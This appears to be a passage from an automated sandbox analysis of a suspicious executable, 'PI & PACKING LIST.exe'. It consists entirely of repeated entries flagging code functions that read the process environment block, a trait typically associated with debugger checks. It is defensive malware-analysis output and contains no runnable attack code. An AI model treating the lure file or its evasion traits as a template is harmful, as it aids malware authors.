Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125C182 mov eax, dword ptr fs:[00000030h] 2_2_0125C182
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262990 mov eax, dword ptr fs:[00000030h] 2_2_01262990
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0123B1E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0123B1E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0123B1E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012C41E8 mov eax, dword ptr fs:[00000030h] 2_2_012C41E8
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h] 2_2_0124B02A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h] 2_2_0124B02A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h] 2_2_0124B02A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h] 2_2_0124B02A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h] 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h] 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h] 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h] 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01304015 mov eax, dword ptr fs:[00000030h] 2_2_01304015
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01304015 mov eax, dword ptr fs:[00000030h] 2_2_01304015
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h] 2_2_012B7016
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h] 2_2_012B7016
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h] 2_2_012B7016
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01301074 mov eax, dword ptr fs:[00000030h] 2_2_01301074
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2073 mov eax, dword ptr fs:[00000030h] 2_2_012F2073
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01250050 mov eax, dword ptr fs:[00000030h] 2_2_01250050
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01250050 mov eax, dword ptr fs:[00000030h] 2_2_01250050
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012790AF mov eax, dword ptr fs:[00000030h] 2_2_012790AF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0126F0BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F0BF mov eax, dword ptr fs:[00000030h] 2_2_0126F0BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F0BF mov eax, dword ptr fs:[00000030h] 2_2_0126F0BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239080 mov eax, dword ptr fs:[00000030h] 2_2_01239080
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B3884 mov eax, dword ptr fs:[00000030h] 2_2_012B3884
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B3884 mov eax, dword ptr fs:[00000030h] 2_2_012B3884
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0125B8E4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0125B8E4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h] 2_2_012340E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h] 2_2_012340E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h] 2_2_012340E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012358EC mov eax, dword ptr fs:[00000030h] 2_2_012358EC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov ecx, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F131B mov eax, dword ptr fs:[00000030h] 2_2_012F131B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0123DB60
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01263B7A mov eax, dword ptr fs:[00000030h] 2_2_01263B7A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01263B7A mov eax, dword ptr fs:[00000030h] 2_2_01263B7A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123DB40 mov eax, dword ptr fs:[00000030h] 2_2_0123DB40
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308B58 mov eax, dword ptr fs:[00000030h] 2_2_01308B58
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123F358 mov eax, dword ptr fs:[00000030h] 2_2_0123F358
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h] 2_2_01264BAD
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h] 2_2_01264BAD
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h] 2_2_01264BAD
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01305BA5 mov eax, dword ptr fs:[00000030h] 2_2_01305BA5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F138A mov eax, dword ptr fs:[00000030h] 2_2_012F138A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01241B8F mov eax, dword ptr fs:[00000030h] 2_2_01241B8F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01241B8F mov eax, dword ptr fs:[00000030h] 2_2_01241B8F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h] 2_2_0126138B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h] 2_2_0126138B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h] 2_2_0126138B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012ED380 mov ecx, dword ptr fs:[00000030h] 2_2_012ED380
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262397 mov eax, dword ptr fs:[00000030h] 2_2_01262397
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126B390 mov eax, dword ptr fs:[00000030h] 2_2_0126B390
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0125DBE9
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E23E3 mov ecx, dword ptr fs:[00000030h] 2_2_012E23E3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E23E3 mov ecx, dword ptr fs:[00000030h] 2_2_012E23E3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E23E3 mov eax, dword ptr fs:[00000030h] 2_2_012E23E3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B53CA mov eax, dword ptr fs:[00000030h] 2_2_012B53CA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B53CA mov eax, dword ptr fs:[00000030h] 2_2_012B53CA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01274A2C mov eax, dword ptr fs:[00000030h] 2_2_01274A2C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01274A2C mov eax, dword ptr fs:[00000030h] 2_2_01274A2C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A229 mov eax, dword ptr fs:[00000030h] 2_2_0125A229
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B236 mov eax, dword ptr fs:[00000030h] 2_2_0125B236
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01248A0A mov eax, dword ptr fs:[00000030h] 2_2_01248A0A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h] 2_2_01235210
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01235210 mov ecx, dword ptr fs:[00000030h] 2_2_01235210
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h] 2_2_01235210
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01235210 mov eax, dword ptr fs:[00000030h] 2_2_01235210
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123AA16 mov eax, dword ptr fs:[00000030h] 2_2_0123AA16
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123AA16 mov eax, dword ptr fs:[00000030h] 2_2_0123AA16
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01253A1C mov eax, dword ptr fs:[00000030h] 2_2_01253A1C
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FAA16 mov eax, dword ptr fs:[00000030h] 2_2_012FAA16
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FAA16 mov eax, dword ptr fs:[00000030h] 2_2_012FAA16
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012EB260 mov eax, dword ptr fs:[00000030h] 2_2_012EB260
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012EB260 mov eax, dword ptr fs:[00000030h] 2_2_012EB260
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308A62 mov eax, dword ptr fs:[00000030h] 2_2_01308A62
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0127927A mov eax, dword ptr fs:[00000030h] 2_2_0127927A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h] 2_2_01239240
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h] 2_2_01239240
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h] 2_2_01239240
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239240 mov eax, dword ptr fs:[00000030h] 2_2_01239240
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FEA55 mov eax, dword ptr fs:[00000030h] 2_2_012FEA55
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012C4257 mov eax, dword ptr fs:[00000030h] 2_2_012C4257
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012352A5 mov eax, dword ptr fs:[00000030h] 2_2_012352A5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0124AAB0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0124AAB0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0126FAB0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126D294 mov eax, dword ptr fs:[00000030h] 2_2_0126D294
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126D294 mov eax, dword ptr fs:[00000030h] 2_2_0126D294
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F4AEF mov eax, dword ptr fs:[00000030h] 2_2_012F4AEF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262AE4 mov eax, dword ptr fs:[00000030h] 2_2_01262AE4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262ACB mov eax, dword ptr fs:[00000030h] 2_2_01262ACB
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h] 2_2_0126F527
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h] 2_2_0126F527
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F527 mov eax, dword ptr fs:[00000030h] 2_2_0126F527
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308D34 mov eax, dword ptr fs:[00000030h] 2_2_01308D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01243D34 mov eax, dword ptr fs:[00000030h] 2_2_01243D34
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123AD30 mov eax, dword ptr fs:[00000030h] 2_2_0123AD30
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012FE539 mov eax, dword ptr fs:[00000030h] 2_2_012FE539
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012BA537 mov eax, dword ptr fs:[00000030h] 2_2_012BA537
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h] 2_2_01264D3B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h] 2_2_01264D3B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264D3B mov eax, dword ptr fs:[00000030h] 2_2_01264D3B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125C577 mov eax, dword ptr fs:[00000030h] 2_2_0125C577
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125C577 mov eax, dword ptr fs:[00000030h] 2_2_0125C577
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01273D43 mov eax, dword ptr fs:[00000030h] 2_2_01273D43
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B3540 mov eax, dword ptr fs:[00000030h] 2_2_012B3540
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012E3D40 mov eax, dword ptr fs:[00000030h] 2_2_012E3D40
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01257D50 mov eax, dword ptr fs:[00000030h] 2_2_01257D50
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012635A1 mov eax, dword ptr fs:[00000030h] 2_2_012635A1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h] 2_2_01261DB5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h] 2_2_01261DB5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01261DB5 mov eax, dword ptr fs:[00000030h] 2_2_01261DB5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_013005AC mov eax, dword ptr fs:[00000030h] 2_2_013005AC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_013005AC mov eax, dword ptr fs:[00000030h] 2_2_013005AC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h] 2_2_01262581
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262581 mov eax, dword ptr fs:[00000030h] 2_2_01262581
